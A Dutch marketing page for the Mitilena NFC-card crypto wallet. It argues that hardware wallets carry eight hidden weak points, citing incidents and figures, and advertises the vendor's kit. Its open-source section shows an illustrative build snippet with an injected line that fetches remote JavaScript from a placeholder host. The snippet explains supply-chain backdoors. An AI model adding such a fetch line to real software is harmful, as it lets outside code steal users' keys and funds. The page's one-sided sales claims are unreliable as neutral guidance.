8 lekken Open source Checklist FAQ
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Wallet makenMaken
Hardware-wallets · niet-voor-de-hand-liggende lekken

Niet-voor-de-hand-liggende lekken van een hardware-wallet

Je koopt een apparaat om gaten dicht te maken. Nieuwe komen ermee mee: firmware, updates, een service op je computer, een scherm, een doos, een account bij de verkoper. Acht details die reviews als pluspunten noemen — en acht manieren waarop er in 2020–2026 geld doorheen is gehaald.

Echte incidenten met data en bedragen Uit documentatie van fabrikanten We toetsen onze kit aan dezelfde lijst
Prijs van de foutpublieke zaken
2026Coldcard · zwakke willekeur in firmware$100M+
2025Bybit · ondertekenaars tekenden wat ze niet zagen$1.5B
2024Dark Skippy · seed lekt via twee handtekeningenonderzoek
2023Ledger Connect Kit · achterdeur in een library$600K
2021Nep-wallet-app in de App Store17,1 BTC
2020Ledger-klanten-DB gelekt · phishing jarenlang270.000 mensen
Acht lekken

Elk detail dat reviews prijzen is een apart gat

Een hardware-wallet dicht één gat: de sleutel zit niet meer op een telefoon met internet. Maar het apparaat is niet leeg. Het heeft firmware, updates, een desktopprogramma, een scherm, een doos, een verkoper met jouw adres — en elk detail voegt een aanvalsoppervlak toe dat je eerder niet had. Hieronder acht van die details: wat reviews zeggen, hoe er geld doorheen is gehaald, hoe je het gat dicht, en of onze kit dat detail heeft.

Lek 01

Firmware die jouw sleutel maakt

In reviews: «veilige chip — de sleutel ontstaat in het apparaat en verlaat het nooit»

Een sleutel is een enorm willekeurig getal, en firmware maakt hem. Eén bug daar — en er zijn veel minder sleutels dan je denkt: ze worden bij alle eigenaren tegelijk brute-forced, zonder toegang tot het apparaat, jaren na aankoop. De chip doet er niet toe; het gat zit erboven.

Incident
$100M+
Coldcard, juli 2026: een firmware-buildbug sinds 2021 verving stil de hardware-RNG door een zwakke, gevoed uit serienummer en timer. Sleutelsterkte zakte naar ongeveer 40 bits; 5.000+ adressen leeggehaald.
Hoe je het gat dicht
Kun je eigen willekeur meenemen: dobbelstenen, je eigen zin. Een wallet die entropie van jou accepteert, hangt niet aan één firmwarebug.
Dit detail hebben wij niet
Er zit geen firmware op de kaart — het is een versleutelde drager. Mitilena Air maakt de sleutel uit de systeem-RNG van het apparaat, en jij kunt in plaats van willekeurige woorden je eigen seed phrase zetten.
Lek 02

Updates die je moet installeren

In reviews: «de fabrikant stuurt regelmatig security-updates»

Elke update is een moment waarop firmware kan worden omgewisseld. Gemanipuleerde firmware verstopt seed-fragmenten in twee of drie gewone handtekeningen terwijl het apparaat van buiten normaal lijkt. Updates overslaan is ook geen optie: gaten worden juist door die updates gedicht.

Incident
2 handtekeningen
Dark Skippy, augustus 2024: onderzoekers toonden dat kwaadaardige hardware-wallet-firmware de hele seed via twee transacties kan exfiltreren. Eén update van de verkeerde plek is genoeg.
Hoe je het gat dicht
Waar firmware vandaan komt en of het apparaat de handtekening controleert. Het best is wanneer er niets te updaten valt.
Dit detail hebben wij niet
Op de kaart is er niets te updaten of om te wisselen. Ondertekenen gebeurt in de telefoon-app; de builds zijn ondertekend en komen uit de App Store en Google Play — zoals elke app die jij zelf ziet en afsluit.
Lek 03 · Voel de absurditeit
In reviews: «handige desktop-app van de fabrikant»

Een wallet voor wantrouwen die een achtergrondservice meelevert

Je koopt een apparaat om één reden: de computer niet meer te vertrouwen. Om het te laten werken moet je op diezelfde computer een achtergrondservice installeren. Jij hebt hem niet geschreven, niet gestart en beheerst hem niet: hij start mee met het OS, luistert op een poort die elk programma op je machine kan raken, en doet nu iets — wat precies, weet je niet en zul je nooit controleren.

Hij bleef op de achtergrond draaien nadat je de wallet had afgesloten. Jarenlang. Bij een van de grootste fabrikanten was het een aparte «bridge»-service; in 2025 stopten ze hem in de app zelf — de service is er nog, hij sterft alleen mee met het venster. Bij de meeste anderen is het apparaat zonder desktopprogramma een sleutelhanger. Op Linux komen daar udev-regels bij, anders geeft het systeem USB niet vrij.

Dus het ding dat je kocht om niet meer van computerprogramma’s af te hangen, werkt niet zonder een computerprogramma. En niet dat wat je ziet — dat wat eronder draait.

Dit detail hebben wij niet
Er wordt niets op de computer geïnstalleerd: geen service, geen driver, geen poort. De tussenpersoon is de NFC-chip die al in je telefoon zit, van de telefoonfabrikant en onder het OS: hij werkt alleen als de app open is en jij zelf de kaart tippt, en de telefoon vraagt elke keer toestemming. De kaart is passief: geen batterij, geen radio, doet zelf niets. App dicht — er blijft niets over dat zonder jou draait. Eerlijk: een telefoon-app is nog nodig, en die is als elke andere — jij ziet hem, start hem en sluit hem zelf. Niemand woont in het meterkastje.
SysteemmonitorWALLET GESLOTEN
ProcesStatusUptime
HW Wallet Appwallet
door jou gesloten-
hwwalletdachtergrondservice · USB-bridge
actief412d 06:14
gestart door het systeem bij loginniet te sluiten — het is een service
Mock-up; namen zijn illustratief. Zo zag een computer met een van de populairste USB-wallets eruit vóór 2025; daarna zat de «bridge» in de app zelf — dezelfde service, alleen niet meer zichtbaar in de lijst.
Allegorie
Een huis voor privacy — en een huurder in het meterkastje

Je wilde een huis voor privacy. Je kocht het. Toen had je beveiliging nodig — geïnstalleerd. En om het beveiligingsplan te laten werken vroegen ze je een uniform in huis te laten die rond de klok in je meterkastje woont, sleutels van elke deur heeft en aan iemand anders rapporteert. Jij hebt hem niet aangenomen, kunt hem niet ontslaan, en wat hij ’s nachts doet — weet je niet.

Hij is «van ons», natuurlijk. Dat staat in het contract. Je wilde privacy en kreeg een surrogaat: een huis met een huurder die jij niet koos.

Lek 04 · Open source is geen audit
In reviews: «open source — iedereen kan controleren»

Open source is hoe programmeurs samenwerken, geen keurmerk dat het programma niet steelt

Open source is bedacht zodat mensen programma’s kunnen delen en samen repareren. Als samenwerkingsmiddel is het uitstekend. Het was nooit een kwaliteitszegel dat «deze software je geld niet steelt», en hierom: jij gebruikt niet de broncode. Jij gebruikt wat je hebt gedownload.

Tussen een GitHub-repo en het bestand op je telefoon zitten de build, de app store, de update, de server. Op elk van die stappen kan één regel de code binnenkomen die van overal alles ophaalt — en die staat niet in de repo. Je kunt jouw kopie niet met de bron vergelijken: stores leveren een gecompileerd bestand; een webwallet krijgt de code die de server vandaag koos; een browserextensie update ’s nachts stil.

«Open» betekent dat sommige mensen ooit een of andere versie kunnen checken. Wat jouw kopie nu doet — dat betekent het niet.

In de repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Op jouw telefoon · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Eén regel in de build. Niet in de repo, onzichtbaar in de store, actief op jouw apparaat.
Openheid heeft geen van deze zaken gestopt
Ledger Connect Kit2023
open library op GitHub; een kwaadaardige versie ging naar npm; tientallen sites laadden hem live binnen uren
Copay / event-stream2018
open wallet; de achterdeur kwam via een dependency die specifiek daarop mikte
xz utils2024
twintig jaar open; een achterdeur zat in releases tot één engineer merkte dat SSH-login een halve seconde trager was
Coldcard2026
open-source-firmware; vijf jaar buildbug verving de hardware-RNG door een zwakke — sleutels brute-forced zonder apparaattoegang, 5.000+ adressen, $100M+
Wat wél werkt
Niet andermans code lezen — twee checks die iedereen kan doen. Eerst een gedragsaudit: zet een onderscheppende proxy op je computer, stuur de app erdoorheen en kijk wat hij waarheen stuurt. Je hoeft de code niet te lezen — het verkeer is volledig zichtbaar. Ten tweede een architectuur waarin code niets te stelen heeft: als de sleutel nooit op een netwerkapparaat zit, is elke regel in elke update machteloos — er is niets te versturen.
Hoe wij het doen
De eerste bieden we zelf: stuur onze app door een proxy, de webversie door browser-DevTools, en bekijk elk verzoek. De ondertekeningssleutel en seed verschijnen niet; de enige kanttekening is de Monero view key — behandeld op de pagina «hoe een transfer vertrekt». De tweede zit in de kit: de sleutel ontstaat in Mitilena Air op een apparaat zonder internet, leeft op de kaart, en alleen de handtekening bereikt de online app — daar is niets meer te proxy’en. En offline is hier echt: in air-gap-modus hangt het sleutelapparaat nergens aan — geen kabel, geen Bluetooth; de transactie komt en gaat als QR die jij met je ogen ziet. Geen «koude» wallet aan een kabel van een online computer met een eigen service die weet-niet-wat uitwisselt.
Lek 05

Een scherm waarop je niet ziet wat je tekent

In reviews: «bevestigen op het apparaatscherm — een virus op de computer is machteloos»

Het scherm is piepklein, en vaak toont het een hash of «contract call», niet het adres en bedrag. Je bevestigt wat je niet ziet — en de handtekening is toch eerlijk, van jou. Het scherm geeft een gevoel van controle dat er niet is.

Incident
$1.5B
Bybit, februari 2025: ondertekenaars met hardware-wallets bevestigden een transfer die in de UI gewoon leek. De apparaten toonden data die een mens niet kon verifiëren.
Hoe je het gat dicht
Ontvanger, bedrag en type handeling in mensentaal — geen hash — en een Reject-knop met één druk.
Hoe wij het doen
Er is een scherm, maar het is het telefoonscherm: adres, bedrag en type verzoek in woorden — transfer, contract call, goedkeuring — en een Reject-knop. Voor grote bedragen — een apart offline apparaat dat de volledige transactie ontvangt.
Lek 06

Een doos waarin al een seed zit

In reviews: «komt in een verzegelde doos met security-zegel»

Een fysiek apparaat betekent verzending, tussenpersonen en «korting»-marktplaatsen. De wallet komt vooraf ingesteld, met een seed op een briefje erin. Of een lookalike-app in de store vraagt je «de seed in te voeren om te activeren».

Incident
17,1 BTC
App Store, 2021: een eigenaar van een hardware-wallet voerde de seed in een lookalike-app in en verloor 17,1 BTC. Datzelfde jaar, na het DB-lek, kregen Ledger-klanten nep-apparaten met een brief «verhuis je seed naar de nieuwe».
Hoe je het gat dicht
Initialiseer zelf en gebruik nooit een seed die al geschreven aankwam. Een zegel is geen verificatie; verificatie is dat jij de sleutel maakt.
Hoe wij het doen
Kaarten komen leeg: jij maakt de sleutel en schrijft hem zelf — er kan geen kant-en-klare seed in de doos zitten. De app komt alleen uit de App Store en Google Play via links op de site; hij vraagt om een seed alleen bij import en ondertekenen.
Lek 07

Een account bij de verkoper

In reviews: «officiële garantie, support en een persoonlijk account»

Om het apparaat te kopen geef je de fabrikant je naam, e-mail en verzendadres. Jouw veiligheid hangt nu van hun database af. Als die lekt — krijg je jarenlang berichten om «de seed op een nieuw apparaat te bevestigen», soms met pakketjes.

Incident
270.000 mensen
Ledger, 2020: data van 270.000 kopers gelekt, inclusief postadressen. E-mails, telefoontjes en pakketten die vragen de seed te «migreren» gaan tot vandaag door.
Hoe je het gat dicht
Hoe minder ze van je weten, hoe korter de vector: kopen zonder account, support die nooit om een seed vraagt, en de regel «alleen een dief vraagt om de seed».
Dit detail hebben wij niet
De wallet werkt zonder registratie — geen account. De verkoper kent alleen het verzendadres. Noch support noch de app vraagt om een seed.
Lek 08

Eén apparaat en één briefje

In reviews: «stevige behuizing, groot scherm, batterij voor een week»

Hoe meer onderdelen, hoe meer breekt: connector, scherm, batterij. Herstel hangt aan één seed-briefje — doorweekt, zoekgeraakt bij een verhuizing, «voor de zekerheid» gefotografeerd. De meest voorkomende oorzaak van verlies is geen hack.

Incident
≈20 % BTC
Chainalysis schat dat ongeveer een vijfde van alle bitcoin voorgoed weg is — vooral door verloren sleutels, niet door hacks.
Hoe je het gat dicht
Hoeveel sleutelkopieën in de doos zitten en in welke vorm, wat er gebeurt als het apparaat kwijt is, en of er iets in zit dat kan kapotgaan.
Dit detail hebben wij niet
Geen scherm, batterij of connector — niets om te breken. En niet één kopie: vijf spiegelkopieën in de doos — twee NFC-kaarten en drie stealth-stickers in waterdicht plastic, 10+ jaar.
Checklist

Wat er niet in een wallet mag zitten

Acht details voor acht lekken. De lijst past bij elke wallet — hardware, mobiel, browser. Vink aan wat die van jouw keuze heeft — en de onze ook.

01
Een sleutel die alleen software maaktzonder jouw eigen willekeur — jouw zin of dobbelstenen
02
Updates waar de sleutel leeftelke update is een kans om code te wisselen
03
Een service, driver of poort op de computerzie lek 03
04
Een «open source»-badge in plaats van architectuurde sleutel zit waar andermans code hem kan raken
05
Een scherm dat een hash toont in plaats van adres en bedragen geen Reject-knop
06
Een seed die al geschreven aankwamin de doos, in een brief, in een «activatie-app»
07
Een account bij de verkoperen support die om de seed mag vragen
08
Eén enkele kopie en onderdelen die brekenscherm, batterij, connector, één briefje
Op deze lijst heeft de Ultimate-kit geen van de acht details. In de doos: 2 NFC-kaarten en 3 stealth-stickers, Mitilena Air (sleutels zonder internet) en Mitilena Keys (ondertekenen zonder internet). Kaarten komen leeg: jij maakt en versleutelt de sleutel — geen fabriekschip. Inhoud en prijs →
Ultimate · offline-kit

Geen fabrieks-«secure chip» — een drager die jij versleutelt

Kaarten komen leeg. Jij maakt de sleutel in Mitilena Air op een telefoon zonder internet en schrijft hem zelf. Ondertekenen via Mitilena Keys, ook offline: de transactie reist per QR. Vijf identieke kopieën in de doos: 2 NFC-kaarten en 3 stealth-stickers in waterdicht plastic. 18 netwerken, 20.000+ coins, inclusief USDT.

Niets wordt op de computer geïnstalleerd
Geen firmware, updates, scherm of batterij
Transactie naar een offline telefoon — via geluid of QR, geen kabel of USB
Werkt met de gratis Mitilena-telefoon-app
Waterdicht plastic, houdbaarheid 10+ jaar
Wereldwijde verzending · mitilena-store.com
Mitilena NFC-kaart
Ultimate · offline generatie en ondertekening
€369€439
2 NFC-kaarten · 3 stealth-stickers · Mitilena Air · Mitilena Keys-licentie
Ultimate kopen · €369 Basic en Premium — bekijk alle pakketten
FAQ

Wat mensen vragen als ze tot hier zijn gekomen

Hardware-wallet voor- en nadelen — kort?

Eén groot pluspunt: de sleutel zit niet op een telefoon met internet. De nadelen zijn de acht details hierboven — elk voegt aanvalsoppervlak toe. Een goede hardware-wallet is die met minder details, niet meer.

Wat als de telefoon gecompromitteerd is?

Met een kaart op je hoofdtelefoon verschijnt de sleutel in een geïsoleerde omgeving voor de seconde van ondertekenen — hetzelfde risico als elke telefoon-wallet, alleen korter. Voor bedragen die je bang maken — een tweede laag: tekenen op een apart offline apparaat dat de transactie per QR bereikt.

Wat als de kaart gestolen of kwijt is?

Zonder wachtwoord zijn kaart en sticker nutteloos plastic — de sleutel erop is versleuteld. Een verloren kopie wordt vervangen door de andere vier: twee kaarten en drie stickers uit de doos zijn spiegels.

Moet je firmware van een hardware-wallet updaten?

Als de fabrikant een gat dichtte — ja, en dat is precies wanneer firmware kan worden omgewisseld: check de bron en de handtekening. Een drager zonder firmware heeft die keuze niet — niets te updaten, niets om te wisselen.

Hoe verschilt dit van een USB-wallet?

Minder tussenpersonen: geen kabel, driver, achtergrondservice of desktopprogramma. Eén tussenpersoon — de NFC-chip van jouw telefoon — en die antwoordt aan jou en het OS, niet aan de wallet-fabrikant.

Open source betekent veilig?

Het betekent ooit door iemand te controleren. Jij gebruikt niet de code maar wat je downloadde, en je kunt het ene niet met het andere vergelijken. Veiligheid komt uit architectuur waarin de sleutel niet zit waar andermans code hem kan raken.

NFC-kaarten met offline generatie en ondertekening

5 sleutelkopieën · Air · Keys · of een gratis wallet in 30 seconden · Waarom een «koude» hardware-wallet op een chip vaak nep is →
Ultimate kopen · €369 Gratis wallet maken